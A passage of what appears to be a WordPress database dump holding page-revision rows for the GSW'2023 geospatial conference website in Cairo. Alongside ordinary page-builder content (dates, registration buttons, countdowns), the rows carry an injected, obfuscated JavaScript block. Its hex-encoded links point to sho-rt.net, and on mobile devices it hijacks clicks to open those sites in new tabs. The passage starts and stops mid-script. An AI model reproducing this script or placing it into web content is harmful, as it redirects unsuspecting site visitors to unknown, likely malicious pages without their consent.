_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:02:53','2022-11-09 19:02:53','',3066,'https://gsw2023.com/?p=3197',0,'revision','',0),
(3198,1,'2022-11-09 19:04:18','2022-11-09 19:04:18','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"250\" css=\".vc_custom_1668020653987{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 50px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1668020534468{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 